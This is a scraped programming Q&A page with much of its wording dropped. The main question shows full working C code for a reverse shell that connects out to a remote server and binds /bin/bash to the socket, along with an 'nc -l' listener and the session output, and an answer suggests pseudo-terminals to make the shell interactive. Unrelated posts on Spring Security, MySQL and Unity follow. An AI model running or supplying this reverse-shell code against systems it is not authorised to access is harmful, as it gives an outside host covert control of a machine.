C reverse shell issues -

-

i need setup reverse shell in order connect device connected internet through gprs modem.

when special conditions occours, start command on public server fixed ip

nc -l 65535

then i'll make code run (now i'm directly connected device through cable test purposes) (and yes, fork useless in case i'll need in final scenario, kept it)

#include <stdio.h> #include <stdint.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h>  int reverse_shell() {     pid_t p = 0;      /* fork */     p = fork();      if (p == 0)     {         char *shell[2];          int i,fd;         struct sockaddr_in sin;          /* open socket */         fd = socket(af_inet, sock_stream, 0);         sin.sin_family = af_inet;         sin.sin_addr.s_addr = inet_addr("my server public ip address");         sin.sin_port = htons(65535);          /* connect! */         connect(fd, (struct sockaddr *)&sin,sizeof(struct sockaddr_in));          /* assign 3 first fd (input/output/err) open socket */         for(i=0; i<3; i++)             dup2(fd, i);          /* build array */         shell[0] = "/bin/bash";         shell[1] = 0;          /* start reverse shell */         if (execve(shell[0], shell, null) == -1)             printf("error\n");          exit(0);     }      return 0; }  int main() {     reverse_shell(); }

the reverse shell setup but, can see, got no prompt , it's looking bit confusing. 

[root@public-server tmp]# nc -lv 65535 connection yyy.yyy.yyy.yyy port 65535 [tcp/*] accepted cd /etc ls *hosts* hosts hosts.allow hosts.deny

plus, need use scp messages keep on appearing on device prompt , not on reverse-connected server

reverse-connected server:

[root@public-server tmp]# nc -lv 65535 connection yyy.yyy.yyy.yyy port 65535 [tcp/*] accepted ls /etc/hosts /etc/hosts scp /etc/hosts xxx.xxx.xxx.xxx:/tmp/ host key verification failed. lost connection

device prompt:

root@device:/tmp# ./a.out root@device:/tmp# authenticity of host 'xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx)' can't established. rsa key fingerprint aa:e6:aa:1d:aa:a5:c2:fd:aa:4c:4f:e7:aa:34:aa:78. sure want continue connecting (yes/no)?

what can fix , obtain stable , usable reverse shell?

the problem shell gets plain file descriptor. that, can operate executing script. operate interactively, needs terminal allowing termios stuff. pseudo-terminals (pty) for. quick google search brought this guide, didn't read entirely, maybe there better sources -- luck.

ps: have no experience ptys, wrong, assume should somehow set term environment variable on client side of server before starting shell, advisable implement own server (instead of nc) , have little initialization protocol bevore starting shell.


Comments

Post a Comment

Popular posts from this blog

Fail to load namespace Spring Security http://www.springframework.org/security/tags -

-
i have problem namespace of spring security on xhtml page. don't understand why can't load uri, , have following issue: whitelabel error page application has no explicit mapping /error, seeing fallback. tue jul 21 16:58:12 utc 2015 there unexpected error (type=not found, status=404). please need help! possible uri has been changed? best regards you using incorrect namespace url. correct url http://www.springframework.org/schema/security the error page seeing spring source website since not recognize url. try visiting http://www.springsource.org/security/tags in browser update : spring security tags used in jsp page correct tag lib declaration is: <%@ taglib prefix="sec" uri="http://www.springframework.org/security/tags" %>
Read more

sql - MySQL query optimization using coalesce -

-
can explain me why second query faster first? (first 1 takes around 40 seconds, second 1 less 0.1) select releases.feature_code, releases.platform_id, version, release_date, general_available, uri, filesize, display_name, feature_name.full_name, if ((select exists(select 1 release_exceptions releases.feature_code = release_exceptions.feature_code , releases.platform_id = release_exceptions.platform_id , releases.version = release_exceptions.version) = 1), 1, 0) release_exceptions releases left outer join platform using(platform_id) left outer join feature_name using(feature_code) order version desc; ~~~ query 2 ------------------ ~~~ select feature_code, version, release_date, general_available, platform_id, uri, filesize, display_name, feature_name.full_name, coalesce(release_exceptions, 0) release_exceptions mus.releases left outer join ( select distinct feature_code, version, platform_id, 1 release_exceptions mus.release_exceptions ) release_exceptions using ...
Read more

unity3d - Unity local avoidance in user created world -

-
i'm using unity3d networked multiplayer online game have large complex 3d terrain scene forest, trees, cliff, hills, mountains, bounders, etc. players can build structures sort of minecraft, , put them anywhere in scene, or move them around anytime. aside human controlled players, there automated ai players , objects animals roaming around scene following path. the problem how make these automated ai players , animals, able navigate around static , dynamic player created structures, because path follow can blocked player created structures, or other players , other ai objects, cliffs etc. have find away around them or on track if tumble down off high cliff example. so made navmesh , used navagents, takes care of static, non moving objects, how make ai players navigate around each other , dynamic structures created players can number in hundreds? i thought of adding navmeshobstacle everything, result in being attached hundreds of objects since user created structures b...
Read more